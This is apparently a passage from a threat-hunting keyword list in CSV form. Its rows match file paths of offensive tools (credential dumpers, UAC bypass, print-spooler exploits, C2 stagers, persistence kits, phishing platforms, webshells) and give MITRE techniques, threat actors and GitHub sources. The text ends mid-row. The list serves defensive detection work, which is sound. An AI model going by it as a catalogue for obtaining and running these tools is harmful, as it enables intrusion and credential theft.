"*/sshv1.nse*",".{0,1000}\/sshv1\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11625" "*/ssl-ccs-injection.nse*",".{0,1000}\/ssl\-ccs\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11627" "*/ssl-cert.nse*",".{0,1000}\/ssl\-cert\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11628" "*/ssl-cert-intaddr.nse*",".{0,1000}\/ssl\-cert\-intaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11629" "*/ssl-date.nse*",".{0,1000}\/ssl\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11630" "*/ssl-dh-params.nse*",".{0,1000}\/ssl\-dh\-params\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11631" "*/ssl-enum-ciphers.nse*",".{0,1000}\/ssl\-enum\-ciphers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11632" "*/ssl-heartbleed.nse*",".{0,1000}\/ssl\-heartbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11633" "*/ssl-known-key.nse*",".{0,1000}\/ssl\-known\-key\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11634" "*/ssl-poodle.nse*",".{0,1000}\/ssl\-poodle\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11635" "*/sslv2.nse*",".{0,1000}\/sslv2\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11636" "*/sslv2-drown.nse*",".{0,1000}\/sslv2\-drown\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11637" "*/ssp/decryptor.py",".{0,1000}\/ssp\/decryptor\.py","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","11638" "*/SspiUacBypass.git*",".{0,1000}\/SspiUacBypass\.git.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","11639" "*/ssploit/*",".{0,1000}\/ssploit\/.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","11640" "*/SSRFmap*",".{0,1000}\/SSRFmap.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","N/A","10","3167","538","2025-02-26T19:39:06Z","2018-10-15T19:08:26Z","11641" 
"*/sstp-discover.nse*",".{0,1000}\/sstp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11642" "*/Sst-Sheller.php*",".{0,1000}\/Sst\-Sheller\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11643" "*/StackCrypt.git*",".{0,1000}\/StackCrypt\.git.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","11644" "*/stager.ps1*",".{0,1000}\/stager\.ps1.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","11645" "*/stager/powershell.py*",".{0,1000}\/stager\/powershell\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11646" "*/stager/powershell/payload.ps1*",".{0,1000}\/stager\/powershell\/payload\.ps1.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11647" "*/stagers/*.ps1*",".{0,1000}\/stagers\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","11648" "*/stagers/CSharpPS*",".{0,1000}\/stagers\/CSharpPS.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - 
T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","11649" "*/StandIn.exe*",".{0,1000}\/StandIn\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11650" "*/StandIn.git*",".{0,1000}\/StandIn\.git.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11651" "*/StandIn_Net35.exe*",".{0,1000}\/StandIn_Net35\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - 
TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11652" "*/StandIn_Net45.exe *",".{0,1000}\/StandIn_Net45\.exe\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11653" "*/StandIn-1.3.zip*",".{0,1000}\/StandIn\-1\.3\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11654" "*/stardust.x64.exe*",".{0,1000}\/stardust\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","11655" "*/Stardust/scripts/loader.x64.exe*",".{0,1000}\/Stardust\/scripts\/loader\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","11656" "*/start.sh dynamic *",".{0,1000}\/start\.sh\sdynamic\s.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - 
T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","11657" "*/start_campaign.py*",".{0,1000}\/start_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","11658" "*/startProxyPool?k=*&random=n&number=2&ip=*",".{0,1000}\/startProxyPool\?k\=.{0,1000}\&random\=n\&number\=2\&ip\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","11659" "*/startProxyPool?k=*&random=y&number=2*",".{0,1000}\/startProxyPool\?k\=.{0,1000}\&random\=y\&number\=2.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","11660" "*/startVNC.sh*",".{0,1000}\/startVNC\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","11661" "*/StaticSyscallsAPCSpawn/*",".{0,1000}\/StaticSyscallsAPCSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","11662" "*/StaticSyscallsInject/*",".{0,1000}\/StaticSyscallsInject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","11663" "*/StayKit.cna*",".{0,1000}\/StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","11664" "*/Staykit/StayKit.*",".{0,1000}\/Staykit\/StayKit\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","11665" "*/Stealer.exe*",".{0,1000}\/Stealer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - 